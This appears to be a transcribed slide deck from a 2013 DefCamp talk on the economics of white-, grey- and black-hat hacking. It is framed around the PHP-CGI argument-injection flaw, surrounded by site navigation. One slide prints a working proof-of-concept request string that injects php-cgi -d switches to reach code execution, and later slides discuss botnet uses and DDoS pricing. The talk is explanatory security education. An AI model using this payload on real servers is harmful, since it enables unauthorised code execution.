Easier, Faster, and More Powerful – Alles Neu macht der Mai -Wir durchleuchte...panagenda
 
ERP Contender Series: Acumatica vs. Sage Intacct
ERP Contender Series: Acumatica vs. Sage IntacctERP Contender Series: Acumatica vs. Sage Intacct
ERP Contender Series: Acumatica vs. Sage IntacctBrainSell Technologies
 
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdf
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdfHow Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdf
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdfFIDO Alliance
 
ECS 2024 Teams Premium - Pretty Secure
ECS 2024   Teams Premium - Pretty SecureECS 2024   Teams Premium - Pretty Secure
ECS 2024 Teams Premium - Pretty SecureFemke de Vroome
 
Working together SRE & Platform Engineering
Working together SRE & Platform EngineeringWorking together SRE & Platform Engineering
Working together SRE & Platform EngineeringMarcus Vechiato
 
1111 ChatGPT Prompts PDF Free Download - Prompts for ChatGPT
1111 ChatGPT Prompts PDF Free Download - Prompts for ChatGPT1111 ChatGPT Prompts PDF Free Download - Prompts for ChatGPT
1111 ChatGPT Prompts PDF Free Download - Prompts for ChatGPTiSEO AI
 
Google I/O Extended 2024 Warsaw
Google I/O Extended 2024 WarsawGoogle I/O Extended 2024 Warsaw
Google I/O Extended 2024 WarsawGDSC PJATK
 

Recently uploaded (20)

Continuing Bonds Through AI: A Hermeneutic Reflection on Thanabots
Continuing Bonds Through AI: A Hermeneutic Reflection on ThanabotsContinuing Bonds Through AI: A Hermeneutic Reflection on Thanabots
Continuing Bonds Through AI: A Hermeneutic Reflection on Thanabots
 
Using IESVE for Room Loads Analysis - UK & Ireland
Using IESVE for Room Loads Analysis - UK & IrelandUsing IESVE for Room Loads Analysis - UK & Ireland
Using IESVE for Room Loads Analysis - UK & Ireland
 
Behind the Scenes From the Manager's Chair: Decoding the Secrets of Successfu...
Behind the Scenes From the Manager's Chair: Decoding the Secrets of Successfu...Behind the Scenes From the Manager's Chair: Decoding the Secrets of Successfu...
Behind the Scenes From the Manager's Chair: Decoding the Secrets of Successfu...
 
Linux Foundation Edge _ Overview of FDO Software Components _ Randy at Intel.pdf
Linux Foundation Edge _ Overview of FDO Software Components _ Randy at Intel.pdfLinux Foundation Edge _ Overview of FDO Software Components _ Randy at Intel.pdf
Linux Foundation Edge _ Overview of FDO Software Components _ Randy at Intel.pdf
 
Powerful Start- the Key to Project Success, Barbara Laskowska
Powerful Start- the Key to Project Success, Barbara LaskowskaPowerful Start- the Key to Project Success, Barbara Laskowska
Powerful Start- the Key to Project Success, Barbara Laskowska
 
Oauth 2.0 Introduction and Flows with MuleSoft
Oauth 2.0 Introduction and Flows with MuleSoftOauth 2.0 Introduction and Flows with MuleSoft
Oauth 2.0 Introduction and Flows with MuleSoft
 
Simplified FDO Manufacturing Flow with TPMs _ Liam at Infineon.pdf
Simplified FDO Manufacturing Flow with TPMs _ Liam at Infineon.pdfSimplified FDO Manufacturing Flow with TPMs _ Liam at Infineon.pdf
Simplified FDO Manufacturing Flow with TPMs _ Liam at Infineon.pdf
 
Microsoft CSP Briefing Pre-Engagement - Questionnaire
Microsoft CSP Briefing Pre-Engagement - QuestionnaireMicrosoft CSP Briefing Pre-Engagement - Questionnaire
Microsoft CSP Briefing Pre-Engagement - Questionnaire
 
WSO2CONMay2024OpenSourceConferenceDebrief.pptx
WSO2CONMay2024OpenSourceConferenceDebrief.pptxWSO2CONMay2024OpenSourceConferenceDebrief.pptx
WSO2CONMay2024OpenSourceConferenceDebrief.pptx
 
Syngulon - Selection technology May 2024.pdf
Syngulon - Selection technology May 2024.pdfSyngulon - Selection technology May 2024.pdf
Syngulon - Selection technology May 2024.pdf
 
Designing for Hardware Accessibility at Comcast
Designing for Hardware Accessibility at ComcastDesigning for Hardware Accessibility at Comcast
Designing for Hardware Accessibility at Comcast
 
A Business-Centric Approach to Design System Strategy
A Business-Centric Approach to Design System StrategyA Business-Centric Approach to Design System Strategy
A Business-Centric Approach to Design System Strategy
 
ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...
ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...
ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...
 
Easier, Faster, and More Powerful – Alles Neu macht der Mai -Wir durchleuchte...
Easier, Faster, and More Powerful – Alles Neu macht der Mai -Wir durchleuchte...Easier, Faster, and More Powerful – Alles Neu macht der Mai -Wir durchleuchte...
Easier, Faster, and More Powerful – Alles Neu macht der Mai -Wir durchleuchte...
 
ERP Contender Series: Acumatica vs. Sage Intacct
ERP Contender Series: Acumatica vs. Sage IntacctERP Contender Series: Acumatica vs. Sage Intacct
ERP Contender Series: Acumatica vs. Sage Intacct
 
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdf
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdfHow Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdf
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdf
 
ECS 2024 Teams Premium - Pretty Secure
ECS 2024   Teams Premium - Pretty SecureECS 2024   Teams Premium - Pretty Secure
ECS 2024 Teams Premium - Pretty Secure
 
Working together SRE & Platform Engineering
Working together SRE & Platform EngineeringWorking together SRE & Platform Engineering
Working together SRE & Platform Engineering
 
1111 ChatGPT Prompts PDF Free Download - Prompts for ChatGPT
1111 ChatGPT Prompts PDF Free Download - Prompts for ChatGPT1111 ChatGPT Prompts PDF Free Download - Prompts for ChatGPT
1111 ChatGPT Prompts PDF Free Download - Prompts for ChatGPT
 
Google I/O Extended 2024 Warsaw
Google I/O Extended 2024 WarsawGoogle I/O Extended 2024 Warsaw
Google I/O Extended 2024 Warsaw
 

Defcamp 2013 - Does it pay to be a blackhat hacker

  • 1. DOES IT PAY TO BE A BLACKHAT HACKER? DefCamp Romania – November 29, 2013 Speaker: Dan Catalin VASILE
  • 2. About me • Information Security Consultant • OWASP Romania Board Member • InfoSec Researcher / Writer / Presenter dan@pentest.ro http://www.pentest.ro
  • 3. Agenda • • • • What is a hacker? Different types of hats A real world vulnerability Exploitation – White – Grey – Black • Gains and risks • Conclusion
  • 4. What is a hacker? Original definition (MIT 1960s & RFC 1392) A person who delights in having an intimate understanding of the internal workings of a system, computers and computer networks in particular. Main-stream media definition & general public acceptance (also in RFC 1392) Mass media and general public's usage of the word hacker refers to security breakers motivated mainly by financial gains. Hackers may be motivated by a multitude of reasons, such as profit, protest, or challenge.
  • 5. Different kinds of hats White hat An ethical computer hacker, or a computer security expert, who specializes in penetration testing and in other testing methodologies to ensure the security of an organization's information systems. Grey hat A skilled hacker whose activities fall somewhere between white and black hat hackers in a variety of practices. Sometimes he acts illegally, though in good will, to identify vulnerabilities in computing processes. Black hat A hacker who violates computer security for little reason beyond maliciousness or for personal gain.
  • 6. A real world vulnerability Apache Web Server :: remote code execution Where? In the default installation of php5-cgi package. The problem PHP-CGI-based setups contain a vulnerability when parsing query string parameters from php files. Description When the php-cgi receives a processed query string parameter as command line arguments which allows command-line switches, such as -s, -d or -c to be passed to the php-cgi binary, which can be exploited to disclose source code and obtain arbitrary code execution.
  • 7. A real world vulnerability Apache Web Server :: remote code execution The vulnerability In the source code file sapi/cgi/cgi_main.c of PHP we can see that the security check is done when the php.ini configuration setting cgi.force_redirect is set and the php.ini configuration setting cgi.redirect_status_env is set to NULL. STD_PHP_INI_ENTRY("cgi.force_redirect","1", PHP_INI_SYSTEM, OnUpdateBool,force_redirect, php_cgi_globals_struct, php_cgi_globals) STD_PHP_INI_ENTRY("cgi.redirect_status_env", NULL, PHP_INI_SYSTEM, OnUpdateString, redirect_status_env, php_cgi_globals_struct, php_cgi_globals) It is possible to set cgi.force_redirect to zero and cgi.redirect_status_env to zero using the -d switch so that php-cgi gets fully executed and we can use the payload in the POST data field to execute arbitrary php.
  • 8. A real world vulnerability Apache Web Server :: remote code execution Impact!!! A remote unauthenticated attacker could obtain sensitive information, cause a denial of service condition or may be able to execute arbitrary code with the privileges of the web server.
  • 9. A real world vulnerability Apache Web Server :: remote code execution Exploitation PoC char poststr[] = "POST %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F" "%%75%%72%%6C%%5F%%69%%6E%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64" "+%%73%%61%%66%%65%%5F%%6D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73" "%%75%%68%%6F%%73%%69%%6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E" "%%3D%%6F%%6E+%%2D%%64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63" "%%74%%69%%6F%%6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62" "%%61%%73%%65%%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74" "%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68" "%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F" "%%72%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%63" "%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74%%75%%73" "%%5F%%65%%6E%%76%%3D%%30+%%2D%%6E HTTP/1.1rn" "Host: %srn" "User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26" "(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25rn" "Content-Type: application/x-www-form-urlencodedrn" "Content-Length: %drn" "Connection: closernrn%s"; -d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n
  • 10. A real world vulnerability Apache Web Server :: remote code execution Show me the numbers
  • 11. A tale of three Alice Bob Mallory
  • 12. What are the options? Responsible disclosure - Let Apache know about the problem - Let them fix it - Allow “some” time for the patch to be installed on most (??) of the systems - Make the public announcement and get the credit - For some cash you can make Google pay for it A list of bug bounties programs: https://bugcrowd.com/list-of-bug-bounty-programs/
  • 13. What are the options? Sell the vulnerability to a broker - TippingPoint's Zero-Day Initiative - iDefense's Vulnerability Contributor Program - Vupen’s Threat Protection Program
  • 14. What are the options? Exploit it on your own! - Small scale - A few selected targets - Very large scale - Internet size attack Create a botnet of servers
  • 15. White Hat Alice Employer: big consulting corporation Annual net income: ~$80.000 Approach: - Responsible disclosure Gains: - Fame - ~$3k / reporting the vulnerability https://www.google.com/about/appsecurity/patch-rewards/ Risks: - Mainly risk free
  • 16. Grey Hat Bob Employer: small web-hosting provider Annual net income: ~$45.000 Approach: - Exploit it on a small scale Sell it to a broker Disclose it anonymously Gains: - No fame, just some fortune $50k from the broker ~$15k / year Risks: - Legal charges for hacking
  • 17. Black Hat Mallory Employer: self-employed/freelancer Annual net income: ~$20.000 Approach: - Exploit it on a ‘never-seen’ scale Phase 1
  • 18. Black Hat Mallory Phase 2 Scale? Millions of machines (10+)
  • 19. Black Hat Mallory Uses for the botnet • • • • • • • • Distributed Denial-of-Service Attacks Spamming Sniffing Traffic Spreading new malware Advertisement services abuse Manipulating pools/games/etc Mass identity theft Many others
  • 20. Black Hat Mallory DDOS Market price: $200/10k bots/day Mallory’s price? ~200k/day/client Multiple clients He can literally make millions every day.
  • 21. Black Hat Mallory DDOS Spamhaus DDOS attack When? March 2013 How big? 300Gbps
  • 22. Black Hat Mallory Risks? Besides being the most wanted cyber-criminal ever?  Going to jail! Side thoughts - He only uses Bitcoins or alternative untraceable payment options - He uses money mules to cash out - The botnet gets divided - He moves to a country with no extradition treaty
  • 23. Aftermath It takes months (years?) for the Internet to recover after such a breach. Patching, releasing, clean install, removing all the infections is a painfully long process since the botnet tries to reactivate. What was real and what was not? - Apache PHP Vulnerability – REAL - PoC – REAL - the impact – not so real -Black-hat exploitation – science-fiction, yet doable
  • 24. A tale of three Alice Bob Mallory
  • 25. Conclusions Are there any? Does it pay to be blackhat? It does. Financially. Only! Do we hunt all blackhats down? Different shades of gray.

Editor's Notes

  1. Hi everybody. My name is Dan Vasile and today we’re going to talk about money! More specifically, the economics behind the hacking scenes. We don’t have much time to go over all the aspects, but we should set the ground for a proper understanding of the subject.The whole idea behind this talk is to see if we need to make a change in our careers and change the hats. I am very keen to find out if being on the dark side really pays off and what it takes to be black.
  2. First things first, a little bit about myself. I have to set the proper background here, since I’ve asked the all important question: Does it pay to be black?I am and have been for some time now, a consultant in the InfoSec world. I’m also a board member of OWASP Romania, which is becoming a great place for exchanging information security ideas and not only those related to web applications, but rather all sort of applications. I invite you to join the group and the regular meetings, just search for OWASP Romania and you’ll find us. You’ll also find me with my colleagues at launch time outside the conference room, presenting OWASP projects. Come there for chatting with us.I’ve been involved in information security research, I publish on my blog and I present at conferences. Just like I do now.
  3. This is the agenda of the presentation.